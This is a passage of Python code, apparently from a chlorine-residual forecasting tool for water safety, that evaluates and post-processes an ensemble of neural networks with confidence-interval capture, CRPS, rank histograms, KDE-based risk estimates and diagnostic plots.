CI_80_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.1)))]
)
CI_80_Upper = np.append(
CI_80_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.9)))]
)
CI_70_Lower = np.append(
CI_70_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.15)))]
)
CI_70_Upper = np.append(
CI_70_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.85)))]
)
CI_60_Lower = np.append(
CI_60_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.2)))]
)
CI_60_Upper = np.append(
CI_60_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.8)))]
)
CI_50_Lower = np.append(
CI_50_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.25)))]
)
CI_50_Upper = np.append(
CI_50_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.75)))]
)
CI_40_Lower = np.append(
CI_40_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.3)))]
)
CI_40_Upper = np.append(
CI_40_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.7)))]
)
CI_30_Lower = np.append(
CI_30_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.35)))]
)
CI_30_Upper = np.append(
CI_30_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.65)))]
)
CI_20_Lower = np.append(
CI_20_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.4)))]
)
CI_20_Upper = np.append(
CI_20_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.6)))]
)
CI_10_Lower = np.append(
CI_10_Lower, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.45)))]
)
CI_10_Upper = np.append(
CI_10_Upper, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.55)))]
)
CI_median = np.append(
CI_median, evaluation_range[np.argmin(np.abs((scipy_cdf - 0.50)))]
)
Kernel_Risk = np.append(Kernel_Risk, scipy_kde.integrate_box_1d(-10, 0.2))
Heaviside = (evaluation_range >= Y_true[a]).astype(int)
CRPS_dif = (scipy_cdf - Heaviside) ** 2
CRPS = np.append(CRPS, np.sum(CRPS_dif * 0.001))
mean_CRPS = np.mean(CRPS)
capture_all = (
np.less_equal(Y_true, max_CI) * np.greater_equal(Y_true, min_CI) * 1
)
capture_90 = (
np.less_equal(Y_true, CI_90_Upper)
* np.greater_equal(Y_true, CI_90_Lower)
* 1
)
capture_80 = (
np.less_equal(Y_true, CI_80_Upper)
* np.greater_equal(Y_true, CI_80_Lower)
* 1
)
capture_70 = (
np.less_equal(Y_true, CI_70_Upper)
* np.greater_equal(Y_true, CI_70_Lower)
* 1
)
capture_60 = (
np.less_equal(Y_true, CI_60_Upper)
* np.greater_equal(Y_true, CI_60_Lower)
* 1
)
capture_50 = (
np.less_equal(Y_true, CI_50_Upper)
* np.greater_equal(Y_true, CI_50_Lower)
* 1
)
capture_40 = (
np.less_equal(Y_true, CI_40_Upper)
* np.greater_equal(Y_true, CI_40_Lower)
* 1
)
capture_30 = (
np.less_equal(Y_true, CI_30_Upper)
* np.greater_equal(Y_true, CI_30_Lower)
* 1
)
capture_20 = (
np.less_equal(Y_true, CI_20_Upper)
* np.greater_equal(Y_true, CI_20_Lower)
* 1
)
capture_10 = (
np.less_equal(Y_true, CI_10_Upper)
* np.greater_equal(Y_true, CI_10_Lower)
* 1
)
length_20 = np.sum(np.less(Y_true, 0.2))
capture_all_20 = capture_all * np.less(Y_true, 0.2)
capture_90_20 = capture_90 * np.less(Y_true, 0.2)
capture_80_20 = capture_80 * np.less(Y_true, 0.2)
capture_70_20 = capture_70 * np.less(Y_true, 0.2)
capture_60_20 = capture_60 * np.less(Y_true, 0.2)
capture_50_20 = capture_50 * np.less(Y_true, 0.2)
capture_40_20 = capture_40 * np.less(Y_true, 0.2)
capture_30_20 = capture_30 * np.less(Y_true, 0.2)
capture_20_20 = capture_20 * np.less(Y_true, 0.2)
capture_10_20 = capture_10 * np.less(Y_true, 0.2)
capture_all_sum = np.sum(capture_all)
capture_90_sum = np.sum(capture_90)
capture_80_sum = np.sum(capture_80)
capture_70_sum = np.sum(capture_70)
capture_60_sum = np.sum(capture_60)
capture_50_sum = np.sum(capture_50)
capture_40_sum = np.sum(capture_40)
capture_30_sum = np.sum(capture_30)
capture_20_sum = np.sum(capture_20)
capture_10_sum = np.sum(capture_10)
capture_all_20_sum = np.sum(capture_all_20)
capture_90_20_sum = np.sum(capture_90_20)
capture_80_20_sum = np.sum(capture_80_20)
capture_70_20_sum = np.sum(capture_70_20)
capture_60_20_sum = np.sum(capture_60_20)
capture_50_20_sum = np.sum(capture_50_20)
capture_40_20_sum = np.sum(capture_40_20)
capture_30_20_sum = np.sum(capture_30_20)
capture_20_20_sum = np.sum(capture_20_20)
capture_10_20_sum = np.sum(capture_10_20)
capture_sum_squares = (
(0.1 - capture_10_sum / test_len) ** 2
+ (0.2 - capture_20_sum / test_len) ** 2
+ (0.3 - capture_30_sum / test_len) ** 2
+ (0.4 - capture_40_sum / test_len) ** 2
+ (0.5 - capture_50_sum / test_len) ** 2
+ (0.6 - capture_60_sum / test_len) ** 2
+ (0.7 - capture_70_sum / test_len) ** 2
+ (0.8 - capture_80_sum / test_len) ** 2
+ (0.9 - capture_90_sum / test_len) ** 2
+ (1 - capture_all_sum / test_len) ** 2
)
capture_20_sum_squares = (
(0.1 - capture_10_20_sum / length_20) ** 2
+ (0.2 - capture_20_20_sum / length_20) ** 2
+ (0.3 - capture_30_20_sum / length_20) ** 2
+ (0.4 - capture_40_20_sum / length_20) ** 2
+ (0.5 - capture_50_20_sum / length_20) ** 2
+ (0.6 - capture_60_20_sum / length_20) ** 2
+ (0.7 - capture_70_20_sum / length_20) ** 2
+ (0.8 - capture_80_20_sum / length_20) ** 2
+ (0.9 - capture_90_20_sum / length_20) ** 2
+ (1 - capture_all_20_sum / length_20) ** 2
)
return (
mean_CRPS,
capture_sum_squares,
capture_20_sum_squares,
capture_all_sum / test_len,
capture_all_20_sum / length_20,
)
def post_process_cal(self):
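        # Compares the KDE post-processed ensemble against the raw ensemble using
        # skill scores for CRPS, confidence-interval reliability (overall and below
        # 0.2 mg/L) and percent capture; post-processing is retained only when the
        # summed skill (Net_Score) is positive.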
self.WB_bandwidth = self.get_bw()
(
self.CRPS_post_cal,
self.CI_reliability_post_cal,
self.CI_reliability_02_post_cal,
self.percent_capture_post_cal,
self.percent_capture_02_post_cal,
) = self.post_process_performance_eval(self.WB_bandwidth)
CRPS_Skill = (self.CRPS_post_cal - self.CRPS_cal) / (0 - self.CRPS_cal)
CI_Skill = (self.CI_reliability_post_cal - self.CI_reliability_cal) / (
0 - self.CI_reliability_cal
)
CI_20_Skill = (self.CI_reliability_02_post_cal - self.CI_reliability_02_cal) / (
0 - self.CI_reliability_02_cal
)
PC_Skill = (self.percent_capture_post_cal - self.percent_capture_cal) / (
1 - self.percent_capture_cal
)
PC_20_Skill = (
self.percent_capture_02_post_cal - self.percent_capture_02_cal
) / (1 - self.percent_capture_02_cal)
Net_Score = CRPS_Skill + CI_Skill + CI_20_Skill + PC_Skill + PC_20_Skill
if Net_Score > 0:
self.post_process_check = True
else:
self.post_process_check = False
def full_performance_evaluation(self, directory):
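        # Hold-out verification: the imported data are split 75/25 into calibration
        # and test sets, the ensemble is retrained on the calibration portion, and
        # the same capture / rank-histogram / delta-score diagnostics as in
        # calibration_performance_evaluation are computed on the unseen test set.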
x_norm = self.predictors_scaler.transform(self.predictors)
t_norm = self.targets_scaler.transform(self.targets)
base_model = self.model
        base_model.save(os.path.join(directory, "base_network.h5"))
x_cal_norm, x_test_norm, t_cal_norm, t_test_norm = train_test_split(
x_norm, t_norm, test_size=0.25, shuffle=False, random_state=10
)
self.verifying_observations = self.targets_scaler.inverse_transform(t_test_norm)
self.test_x_data = self.predictors_scaler.inverse_transform(x_test_norm)
early_stopping_monitor = keras.callbacks.EarlyStopping(
monitor="val_loss", min_delta=0, patience=10, restore_best_weights=True
)
self.verifying_predictions = []
for i in range(0, self.network_count):
tf.keras.backend.clear_session()
            self.model = keras.models.load_model(os.path.join(directory, "base_network.h5"))
x_norm_train, x_norm_val, t_norm_train, t_norm_val = train_test_split(
x_cal_norm,
t_cal_norm,
train_size=1 / 3,
shuffle=True,
random_state=i**2,
)
new_weights = [
np.random.uniform(-0.05, 0.05, w.shape)
for w in self.model.get_weights()
]
self.model.set_weights(new_weights)
self.model.fit(
x_norm_train,
t_norm_train,
epochs=self.epochs,
validation_data=(x_norm_val, t_norm_val),
callbacks=[early_stopping_monitor],
verbose=0,
batch_size=len(t_norm_train),
)
self.verifying_predictions.append(self.targets_scaler.inverse_transform(self.model.predict(x_test_norm)))
Y_true = np.array(self.verifying_observations)
Y_pred = np.array(self.verifying_predictions)
FRC_X = self.test_x_data[:, 0]
capture_all = (
np.less_equal(Y_true, np.max(Y_pred, axis=0))
* np.greater_equal(Y_true, np.min(Y_pred, axis=0))
* 1
)
capture_90 = (
np.less_equal(Y_true, np.percentile(Y_pred, 95, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 5, axis=0))
* 1
)
capture_80 = (
np.less_equal(Y_true, np.percentile(Y_pred, 90, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 10, axis=0))
* 1
)
capture_70 = (
np.less_equal(Y_true, np.percentile(Y_pred, 85, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 15, axis=0))
* 1
)
capture_60 = (
np.less_equal(Y_true, np.percentile(Y_pred, 80, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 20, axis=0))
* 1
)
capture_50 = (
np.less_equal(Y_true, np.percentile(Y_pred, 75, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 25, axis=0))
* 1
)
capture_40 = (
np.less_equal(Y_true, np.percentile(Y_pred, 70, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 30, axis=0))
* 1
)
capture_30 = (
np.less_equal(Y_true, np.percentile(Y_pred, 65, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 35, axis=0))
* 1
)
capture_20 = (
np.less_equal(Y_true, np.percentile(Y_pred, 60, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 40, axis=0))
* 1
)
capture_10 = (
np.less_equal(Y_true, np.percentile(Y_pred, 55, axis=0))
* np.greater_equal(Y_true, np.percentile(Y_pred, 45, axis=0))
* 1
)
capture_all_20 = capture_all * np.less(Y_true, 0.2)
capture_90_20 = capture_90 * np.less(Y_true, 0.2)
capture_80_20 = capture_80 * np.less(Y_true, 0.2)
capture_70_20 = capture_70 * np.less(Y_true, 0.2)
capture_60_20 = capture_60 * np.less(Y_true, 0.2)
capture_50_20 = capture_50 * np.less(Y_true, 0.2)
capture_40_20 = capture_40 * np.less(Y_true, 0.2)
capture_30_20 = capture_30 * np.less(Y_true, 0.2)
capture_20_20 = capture_20 * np.less(Y_true, 0.2)
capture_10_20 = capture_10 * np.less(Y_true, 0.2)
length_20 = np.sum(np.less(Y_true, 0.2))
test_len = len(Y_true)
capture_all_sum = np.sum(capture_all)
capture_90_sum = np.sum(capture_90)
capture_80_sum = np.sum(capture_80)
capture_70_sum = np.sum(capture_70)
capture_60_sum = np.sum(capture_60)
capture_50_sum = np.sum(capture_50)
capture_40_sum = np.sum(capture_40)
capture_30_sum = np.sum(capture_30)
capture_20_sum = np.sum(capture_20)
capture_10_sum = np.sum(capture_10)
capture_all_20_sum = np.sum(capture_all_20)
capture_90_20_sum = np.sum(capture_90_20)
capture_80_20_sum = np.sum(capture_80_20)
capture_70_20_sum = np.sum(capture_70_20)
capture_60_20_sum = np.sum(capture_60_20)
capture_50_20_sum = np.sum(capture_50_20)
capture_40_20_sum = np.sum(capture_40_20)
capture_30_20_sum = np.sum(capture_30_20)
capture_20_20_sum = np.sum(capture_20_20)
capture_10_20_sum = np.sum(capture_10_20)
capture = [
capture_10_sum / test_len,
capture_20_sum / test_len,
capture_30_sum / test_len,
capture_40_sum / test_len,
capture_50_sum / test_len,
capture_60_sum / test_len,
capture_70_sum / test_len,
capture_80_sum / test_len,
capture_90_sum / test_len,
capture_all_sum / test_len,
]
capture_20 = [
capture_10_20_sum / length_20,
capture_20_20_sum / length_20,
capture_30_20_sum / length_20,
capture_40_20_sum / length_20,
capture_50_20_sum / length_20,
capture_60_20_sum / length_20,
capture_70_20_sum / length_20,
capture_80_20_sum / length_20,
capture_90_20_sum / length_20,
capture_all_20_sum / length_20,
]
self.percent_capture_cal = capture_all_sum / test_len
self.percent_capture_02_cal = capture_all_20_sum / length_20
self.CI_reliability_cal = (
(0.1 - capture_10_sum / test_len) ** 2
+ (0.2 - capture_20_sum / test_len) ** 2
+ (0.3 - capture_30_sum / test_len) ** 2
+ (0.4 - capture_40_sum / test_len) ** 2
+ (0.5 - capture_50_sum / test_len) ** 2
+ (0.6 - capture_60_sum / test_len) ** 2
+ (0.7 - capture_70_sum / test_len) ** 2
+ (0.8 - capture_80_sum / test_len) ** 2
+ (0.9 - capture_90_sum / test_len) ** 2
+ (1 - capture_all_sum / test_len) ** 2
)
self.CI_reliability_02_cal = (
(0.1 - capture_10_20_sum / length_20) ** 2
+ (0.2 - capture_20_20_sum / length_20) ** 2
+ (0.3 - capture_30_20_sum / length_20) ** 2
+ (0.4 - capture_40_20_sum / length_20) ** 2
+ (0.5 - capture_50_20_sum / length_20) ** 2
+ (0.6 - capture_60_20_sum / length_20) ** 2
+ (0.7 - capture_70_20_sum / length_20) ** 2
+ (0.8 - capture_80_20_sum / length_20) ** 2
+ (0.9 - capture_90_20_sum / length_20) ** 2
+ (1 - capture_all_20_sum / length_20) ** 2
)
# Rank Histogram
rank = []
for a in range(0, len(Y_true)):
n_lower = np.sum(np.greater(Y_true[a], Y_pred[:, a]))
n_equal = np.sum(np.equal(Y_true[a], Y_pred[:, a]))
            deviate_rank = np.random.randint(0, n_equal + 1)  # inclusive upper bound; replaces the deprecated np.random.random_integers
rank = np.append(rank, n_lower + deviate_rank)
rank_hist = np.histogram(rank, bins=self.network_count + 1)
delta = np.sum((rank_hist[0] - (test_len / ((self.network_count + 1)))) ** 2)
delta_0 = self.network_count * test_len / (self.network_count + 1)
self.delta_score_cal = delta / delta_0
CI_x = [0.10, 0.20, 0.30, 0.40, 0.50, 0.60, 0.70, 0.80, 0.90, 1.00]
fig = plt.figure(figsize=(15, 10), dpi=100)
gridspec.GridSpec(2, 3)
plt.subplot2grid((2, 3), (0, 0), colspan=2, rowspan=2)
plt.axhline(0.2, c="k", ls="--", label="Point-of-consumption FRC = 0.2 mg/L")
plt.scatter(
FRC_X, Y_true, edgecolors="k", facecolors="None", s=20, label="Observed"
)
plt.scatter(
FRC_X,
np.median(Y_pred, axis=0),
facecolors="r",
edgecolors="None",
s=10,
label="Forecast Median",
)
plt.vlines(
FRC_X,
np.min(Y_pred, axis=0),
np.max(Y_pred, axis=0),
color="r",
label="Forecast Range",
)
plt.xlabel("Point-of-Distribution FRC (mg/L)")
plt.ylabel("Point-of-Consumption FRC (mg/L)")
plt.subplot2grid((2, 3), (0, 2), colspan=1, rowspan=1)
plt.plot(CI_x, CI_x, c='k')
plt.scatter(CI_x, capture)
plt.scatter(CI_x, capture_20)
plt.xlabel("Ensemble Confidence Interval")
plt.ylabel("Percent Capture")
plt.ylim([0, 1])
plt.xlim([0, 1])
plt.subplot2grid((2, 3), (1, 2), colspan=1, rowspan=1)
plt.hist(rank, bins=(self.network_count + 1), density=True)
plt.xlabel('Rank')
plt.ylabel('Probability')
        plt.savefig(os.path.join(directory, "Verification_Diagnostic_Figs.png"), format="png")
plt.close()
myStringIOBytes = io.BytesIO()
plt.savefig(myStringIOBytes, format='png')
myStringIOBytes.seek(0)
my_base_64_pngData = base64.b64encode(myStringIOBytes.read())
return my_base_64_pngData
def set_inputs_for_table(self, storage_target):
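        # Builds four prediction scenarios over tapstand FRC 0.20-2.00 mg/L at the
        # given storage (elapsed-time) target: average case (median water quality)
        # and worst case (95th percentile water quality), each for AM and PM
        # collection. Water temperature / conductivity columns are added only when
        # they were present in the training data.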
frc = np.arange(0.20, 2.05, 0.05)
lag_time = [storage_target for i in range(0, len(frc))]
am_collect = [0 for i in range(0, len(frc))]
pm_collect = [1 for i in range(0, len(frc))]
temp_med_am = {
"ts_frc": frc,
"elapsed time": lag_time,
"time of collection (0=AM, 1=PM)": am_collect,
}
temp_med_pm = {
"ts_frc": frc,
"elapsed time": lag_time,
"time of collection (0=AM, 1=PM)": pm_collect,
}
temp_95_am = {
"ts_frc": frc,
"elapsed time": lag_time,
"time of collection (0=AM, 1=PM)": am_collect,
}
temp_95_pm = {
"ts_frc": frc,
"elapsed time": lag_time,
"time of collection (0=AM, 1=PM)": pm_collect,
}
if WATTEMP in self.datainputs.columns:
watt_med = [self.median_wattemp for i in range(0, len(frc))]
watt_95 = [self.upper95_wattemp for i in range(0, len(frc))]
temp_med_am.update({"ts_wattemp": watt_med})
temp_med_pm.update({"ts_wattemp": watt_med})
temp_95_am.update({"ts_wattemp": watt_95})
temp_95_pm.update({"ts_wattemp": watt_95})
if COND in self.datainputs.columns:
cond_med = [self.median_cond for i in range(0, len(frc))]
cond_95 = [self.upper95_cond for i in range(0, len(frc))]
temp_med_am.update({"ts_cond": cond_med})
temp_med_pm.update({"ts_cond": cond_med})
temp_95_am.update({"ts_cond": cond_95})
temp_95_pm.update({"ts_cond": cond_95})
self.avg_case_predictors_am = pd.DataFrame(temp_med_am)
self.avg_case_predictors_pm = pd.DataFrame(temp_med_pm)
self.worst_case_predictors_am = pd.DataFrame(temp_95_am)
self.worst_case_predictors_pm = pd.DataFrame(temp_95_pm)
def post_process_predictions(self, results_table_frc):
# results_table_frc=results_table_frc.to_numpy()
evaluation_range = np.arange(-10, 10.001, 0.001)
test1_frc = np.arange(0.2, 2.05, 0.05)
bandwidth = self.WB_bandwidth
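        # For each tapstand FRC level, smooth the ensemble members with a Gaussian
        # KDE (bandwidth from get_bw()), then read the median, min/max, 95%/99%
        # intervals and the risk of point-of-consumption FRC falling below
        # 0 / 0.20 / 0.25 / 0.30 mg/L off the smoothed CDF.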
Max_CI = []
Min_CI = []
CI_99_Upper = []
CI_99_Lower = []
CI_95_Upper = []
CI_95_Lower = []
Median_Results = []
risk_00_kernel_frc = []
risk_20_kernel_frc = []
risk_25_kernel_frc = []
risk_30_kernel_frc = []
for a in range(0, len(test1_frc)):
scipy_kde = scipy.stats.gaussian_kde(results_table_frc[a, :], bw_method=bandwidth)
risk_00_kernel_frc = np.append(risk_00_kernel_frc, scipy_kde.integrate_box_1d(-10, 0))
risk_20_kernel_frc = np.append(risk_20_kernel_frc, scipy_kde.integrate_box_1d(-10, 0.2))
risk_25_kernel_frc = np.append(risk_25_kernel_frc, scipy_kde.integrate_box_1d(-10, 0.25))
risk_30_kernel_frc = np.append(risk_30_kernel_frc, scipy_kde.integrate_box_1d(-10, 0.3))
scipy_pdf = scipy_kde.evaluate(evaluation_range) * 0.001
scipy_cdf = np.cumsum(scipy_pdf)
Min_CI = np.append(Min_CI, evaluation_range[np.max(np.where(scipy_cdf == 0)[0])])
Max_CI = np.append(Max_CI, evaluation_range[np.argmax(scipy_cdf)])
CI_99_Upper = np.append(CI_99_Upper,
evaluation_range[np.argmin(np.abs((scipy_cdf - 0.995)))])
CI_99_Lower = np.append(CI_99_Lower,
evaluation_range[np.argmin(np.abs((scipy_cdf - 0.005)))])
CI_95_Upper = np.append(CI_95_Upper,
evaluation_range[np.argmin(np.abs((scipy_cdf - 0.975)))])
CI_95_Lower = np.append(CI_95_Lower,
evaluation_range[np.argmin(np.abs((scipy_cdf - 0.025)))])
Median_Results = np.append(Median_Results,
evaluation_range[np.argmin(np.abs((scipy_cdf - 0.5)))])
temp_key = {"Tapstand FRC":np.arange(0.20,2.05,0.05),"median": Median_Results, "Ensemble Minimum": Min_CI, "Ensemble Maximum": Max_CI,
"Lower 99 CI": CI_99_Lower, "Upper 99 CI": CI_99_Upper, "Lower 95 CI": CI_95_Lower,
"Upper 95 CI": CI_95_Upper, 'probability==0': risk_00_kernel_frc,
"probability<=0.20": risk_20_kernel_frc, "probability<=0.25": risk_25_kernel_frc,
"probability<=0.30": risk_30_kernel_frc}
post_processed_df = pd.DataFrame(temp_key)
return post_processed_df
def predict(self):
"""
To make the predictions, a pretrained model must be loaded using the import_pretrained_model() method.
        The SWOT ANN uses an ensemble of self.network_count ANNs (200 by default). Each member makes a
        prediction on the inputs and the results are stored; the median of all member predictions is
        calculated and stored here.
The method also calculates the probabilities of the target FRC levels to be less than 0.2, 0.25 and 0.3 mg/L respectively.
The predictions are target FRC values in mg/L, and the probability values range from 0 to 1.
All of the above results are saved in the self.results class field.
V2.0 Notes: If at least 1 WQ variable is provided, we do a scenario analysis, providing targets for the average case
(median water quality) and the "worst case" using the upper 95th percentile water quality
"""
# Initialize empty arrays for the probabilities to be appended in.
avg_case_results_am = {}
avg_case_results_pm = {}
worst_case_results_am = {}
worst_case_results_pm = {}
# Normalize the inputs using the input scaler loaded
input_scaler = self.predictors_scaler
avg_case_inputs_norm_am = input_scaler.transform(self.avg_case_predictors_am)
avg_case_inputs_norm_pm = input_scaler.transform(self.avg_case_predictors_pm)
worst_case_inputs_norm_am = input_scaler.transform(self.worst_case_predictors_am)
worst_case_inputs_norm_pm = input_scaler.transform(self.worst_case_predictors_pm)
##AVERAGE CASE TARGET w AM COLLECTION
# Iterate through all loaded pretrained networks, make predictions based on the inputs,
# calculate the median of the predictions and store everything to self.results
for j in range(0, self.network_count):
key = "se4_frc_net-" + str(j)
predictions = self.targets_scaler.inverse_transform(
self.trained_models["model_" + str(j)].predict(avg_case_inputs_norm_am)).tolist()
temp = sum(predictions, [])
avg_case_results_am.update({key: temp})
self.avg_case_results_am = pd.DataFrame(avg_case_results_am)
self.avg_case_results_am["median"] = self.avg_case_results_am.median(axis=1)
# Include the inputs/predictors in the self.results variable
for i in self.avg_case_predictors_am.keys():
self.avg_case_results_am.update({i: self.avg_case_predictors_am[i].tolist()})
self.avg_case_results_am[i] = self.avg_case_predictors_am[i].tolist()
if self.post_process_check == False:
# Calculate all the probability fields and store them to self.results
# results_table_frc_avg = self.results.iloc[:, 0:(self.network_count - 1)]
self.avg_case_results_am["probability<=0.20"] = np.sum(
np.less_equal(self.avg_case_results_am.iloc[:, 0:(self.network_count - 1)], 0.2),
axis=1) / self.network_count
self.avg_case_results_am["probability<=0.25"] = np.sum(
np.less_equal(self.avg_case_results_am.iloc[:, 0:(self.network_count - 1)], 0.25),
axis=1) / self.network_count
self.avg_case_results_am["probability<=0.30"] = np.sum(
np.less_equal(self.avg_case_results_am.iloc[:, 0:(self.network_count - 1)], 0.3),
axis=1) / self.network_count
else:
self.avg_case_results_am_post = self.post_process_predictions(
self.avg_case_results_am.iloc[:, 0:(self.network_count - 1)].to_numpy())
##AVERAGE CASE TARGET w PM COLLECTION
# Iterate through all loaded pretrained networks, make predictions based on the inputs,
# calculate the median of the predictions and store everything to self.results
for j in range(0, self.network_count):
key = "se4_frc_net-" + str(j)
predictions = self.targets_scaler.inverse_transform(
self.trained_models["model_" + str(j)].predict(avg_case_inputs_norm_pm)).tolist()
temp = sum(predictions, [])
avg_case_results_pm.update({key: temp})
self.avg_case_results_pm = pd.DataFrame(avg_case_results_pm)
self.avg_case_results_pm["median"] = self.avg_case_results_pm.median(axis=1)
# Include the inputs/predictors in the self.results variable
for i in self.avg_case_predictors_pm.keys():
self.avg_case_results_pm.update({i: self.avg_case_predictors_pm[i].tolist()})
self.avg_case_results_pm[i] = self.avg_case_predictors_pm[i].tolist()
if self.post_process_check == False:
# Calculate all the probability fields and store them to self.results
# results_table_frc_avg = self.results.iloc[:, 0:(self.network_count - 1)]
self.avg_case_results_pm["probability<=0.20"] = (
np.sum(
np.less(
self.avg_case_results_pm.iloc[:, 0 : (self.network_count - 1)],
0.2,
),
axis=1,
)
/ self.network_count
)
self.avg_case_results_pm["probability<=0.25"] = (
np.sum(
np.less(
self.avg_case_results_pm.iloc[:, 0 : (self.network_count - 1)],
0.25,
),
axis=1,
)
/ self.network_count
)
self.avg_case_results_pm["probability<=0.30"] = (
np.sum(
np.less(
self.avg_case_results_pm.iloc[:, 0 : (self.network_count - 1)],
0.3,
),
axis=1,
)
/ self.network_count
)
else:
self.avg_case_results_pm_post = self.post_process_predictions(
self.avg_case_results_pm.iloc[:, 0:(self.network_count - 1)].to_numpy())
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
##WORST CASE TARGET w AM COLLECTION
for j in range(0, self.network_count):
key = "se4_frc_net-" + str(j)
predictions = self.targets_scaler.inverse_transform(
self.trained_models["model_" + str(j)].predict(worst_case_inputs_norm_am)).tolist()
temp = sum(predictions, [])
worst_case_results_am.update({key: temp})
self.worst_case_results_am = pd.DataFrame(worst_case_results_am)
self.worst_case_results_am["median"] = self.worst_case_results_am.median(axis=1)
# Include the inputs/predictors in the self.results variable
for i in self.worst_case_predictors_am.keys():
self.worst_case_results_am.update({i: self.worst_case_predictors_am[i].tolist()})
self.worst_case_results_am[i] = self.worst_case_predictors_am[i].tolist()
if self.post_process_check == False:
# Calculate all the probability fields and store them to self.results
# results_table_frc_avg = self.results.iloc[:, 0:(self.network_count - 1)]
self.worst_case_results_am["probability<=0.20"] = (
np.sum(
np.less(
self.worst_case_results_am.iloc[
:, 0 : (self.network_count - 1)
],
0.2,
),
axis=1,
)
/ self.network_count
)
self.worst_case_results_am["probability<=0.25"] = (
np.sum(
np.less(
self.worst_case_results_am.iloc[
:, 0 : (self.network_count - 1)
],
0.25,
),
axis=1,
)
/ self.network_count
)
self.worst_case_results_am["probability<=0.30"] = (
np.sum(
np.less(
self.worst_case_results_am.iloc[
:, 0 : (self.network_count - 1)
],
0.3,
),
axis=1,
)
/ self.network_count
)
else:
self.worst_case_results_am_post = self.post_process_predictions(
self.worst_case_results_am.iloc[:, 0:(self.network_count - 1)].to_numpy())
##WORST CASE TARGET w PM COLLECTION
for j in range(0, self.network_count):
key = "se4_frc_net-" + str(j)
predictions = self.targets_scaler.inverse_transform(
self.trained_models["model_" + str(j)].predict(worst_case_inputs_norm_pm)).tolist()
temp = sum(predictions, [])
worst_case_results_pm.update({key: temp})
self.worst_case_results_pm = pd.DataFrame(worst_case_results_pm)
self.worst_case_results_pm["median"] = self.worst_case_results_pm.median(axis=1)
# Include the inputs/predictors in the self.results variable
for i in self.worst_case_predictors_pm.keys():
self.worst_case_results_pm.update({i: self.worst_case_predictors_pm[i].tolist()})
self.worst_case_results_pm[i] = self.worst_case_predictors_pm[i].tolist()
if self.post_process_check == False:
# Calculate all the probability fields and store them to self.results
# results_table_frc_avg = self.results.iloc[:, 0:(self.network_count - 1)]
self.worst_case_results_pm["probability<=0.20"] = (
np.sum(
np.less(
self.worst_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
],
0.2,
),
axis=1,
)
/ self.network_count
)
self.worst_case_results_pm["probability<=0.25"] = (
np.sum(
np.less(
self.worst_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
],
0.25,
),
axis=1,
)
/ self.network_count
)
self.worst_case_results_pm["probability<=0.30"] = (
np.sum(
np.less(
self.worst_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
],
0.3,
),
axis=1,
)
/ self.network_count
)
else:
self.worst_case_results_pm_post = self.post_process_predictions(
self.worst_case_results_pm.iloc[:, 0:(self.network_count - 1)].to_numpy())
def results_visualization(self, filename, storage_target):
test1_frc = np.arange(0.2, 2.05, 0.05)
# Variables to plot - Full range, 95th percentile, 99th percentile, median, the three risks
if WATTEMP in self.datainputs.columns or COND in self.datainputs.columns:
if self.post_process_check == False:
results_table_frc_avg_am = self.avg_case_results_am.iloc[
:, 0 : (self.network_count - 1)
]
results_table_frc_avg_pm = self.avg_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
]
results_table_frc_worst_am = self.worst_case_results_am.iloc[
:, 0 : (self.network_count - 1)
]
results_table_frc_worst_pm = self.worst_case_results_pm.iloc[
:, 0 : (self.network_count - 1)
]
preds_fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(
2, 2, figsize=(6.69, 6.69), dpi=300
)
ax1.fill_between(
test1_frc,
np.percentile(results_table_frc_avg_am, 97.5, axis=1),
np.percentile(results_table_frc_avg_am, 2.5, axis=1),
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax1.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax1.plot(
test1_frc,
np.min(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=0.5,
label="Minimum/Maximum",
)
ax1.plot(
test1_frc,
np.max(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=0.5,
)
ax1.plot(
test1_frc,
np.median(results_table_frc_avg_am, axis=1),
"#ffa600",
linewidth=1,
label="Median Prediction",
)
ax1.scatter(
self.datainputs[FRC_IN],
self.dataoutputs,
c="k",
s=10,
marker="x",
label="Testing Observations",
)
ax1.legend(
bbox_to_anchor=(0.999, 0.999),
shadow=False,
fontsize="small",
loc="upper right",
)
ax1.set_xlim([0.19, 2.0])
ax1.set_xticks(np.arange(0.2, 2.2, 0.2))
ax1.set_xlabel("Tap Stand FRC (mg/L)")
ax1.set_ylabel("Household FRC (mg/L)")
ax1.set_title("Average Case - AM Collection")
ax2.fill_between(
test1_frc,
np.percentile(results_table_frc_avg_pm, 97.5, axis=1),
np.percentile(results_table_frc_avg_pm, 2.5, axis=1),
facecolor="#ffa600",
alpha=0.5,
label="95th Percentile Range",
)
ax2.axhline(0.2, c="k", ls="-.", linewidth=1, label="FRC = 0.2 mg/L")
ax2.plot(
test1_frc,
